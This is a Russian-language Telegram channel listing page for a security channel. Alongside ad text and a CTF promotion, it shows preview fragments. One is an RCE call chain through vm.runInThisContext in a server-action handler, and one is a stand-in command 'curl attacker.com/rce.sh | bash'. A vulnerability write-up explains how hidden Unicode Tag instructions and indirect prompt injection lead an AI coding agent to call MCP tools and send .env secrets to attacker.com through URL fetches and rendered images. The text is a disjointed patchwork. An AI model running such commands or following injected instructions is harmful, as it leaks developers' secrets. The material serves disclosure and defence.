

Похек
Канал о кибербезопасности, багбаунти и реальных кейсах из мира ИБ. Новости, полезные инструменты, разборы уязвимостей и советы для специалистов всех уровней. Аудитория — активное ИТ-сообщество, эксперты и новички. Идеальная площадка для рекламы в сфере технологий и ИБ.
Статистика канала
Полная статистикаchevron_right
HTTP POST /formaction
↓
decodeAction(formData, serverManifest) [server.js:111]
↓
loadServerReference(serverManifest, "vm#runInThisContext", ["CODE"])
↓
resolveServerReference() → парсит "vm#runInThisContext" → metadata = [vmId, [], "runInThisContext"]
↓
requireModule(metadata)
↓
moduleExports["runInThisContext"] ← БЕЗ hasOwnProperty проверки!
↓
vm.runInThisContext.bind(null, "CODE")
↓
При вызове: vm.runInThisContext("CODE") → RCE!{}
Выполняй задания и участвуй в розыгрыше PS5, VR-шлема Oculus, LEGO и мерч-паков. Победителей объявят 15 декабря в боте.🛡 Задача — тушить киберпожары: от сбоев светофоров до атак на электростанцию. Для этого предстоит решать задания на криптографию, реверс, логику и искать пасхалки от партнеров — R‑Vision, Avanpost, InfoWatch и WMX.
curl attacker.com/rce.sh | bash), что приводит к RCE.
Скрытые инструкции через Unicode Tags
Gemini 3 способна интерпретировать инструкции, скрытые с помощью невидимых символов Unicode Tags (Block U+E0000). Атакующий может внедрить скрытые команды в исходный код или комментарии. Визуально код будет выглядеть безопасно, но при попадании в контекст LLM выполнятся скрытые инструкции. Ручной code review человеком не обнаружит угрозу.
Отсутствие Human-In-The-Loop для MCP инструментов
Реализация протокола MCP в Antigravity не требует подтверждения пользователя перед вызовом инструментов подключенных серверов. Если разработчик подключил MCP-сервер, атакующий может через indirect prompt injection (в тикете, issue или файле) заставить агента вызвать любой доступный инструмент. Если MCP имеет доступ к системе, это ведет к RCE или утечке данных.
Эксфильтрация данных через read_url_content
Инструмент read_url_content доступен агенту без подтверждения HITL. Эксплойт реализует цепочку:
Агент читает конфиденциальный файл (например, .env) через read_file.
Агент вызывает read_url_content для URL вида https://attacker.com/?data=<secrets>, отправляя содержимое файла на сервер злоумышленника.
Эксфильтрация данных через рендеринг изображений
IDE автоматически рендерит изображения в Markdown-ответах агента. При анализе вредоносного файла агент генерирует Markdown с изображением: ``. При рендеринге превью IDE автоматически выполняет GET-запрос, сливая данные в параметрах URL.
Отзывы канала
всего 8 отзывов
- Добавлен: Сначала новые
- Добавлен: Сначала старые
- Оценка: По убыванию
- Оценка: По возрастанию
Каталог Телеграм-каналов для нативных размещений
Похек — это Telegam канал в категории «Интернет технологии», который предлагает эффективные форматы для размещения рекламных постов в Телеграмме. Количество подписчиков канала в 15.9K и качественный контент помогают брендам привлекать внимание аудитории и увеличивать охват. Рейтинг канала составляет 69.1, количество отзывов – 8, со средней оценкой 5.0.
Вы можете запустить рекламную кампанию через сервис Telega.in, выбрав удобный формат размещения. Платформа обеспечивает прозрачные условия сотрудничества и предоставляет детальную аналитику. Стоимость размещения составляет 30769.2 ₽, а за 16 выполненных заявок канал зарекомендовал себя как надежный партнер для рекламы в TG. Размещайте интеграции уже сегодня и привлекайте новых клиентов вместе с Telega.in!
Вы снова сможете добавить каналы в корзину из каталога
Комментарий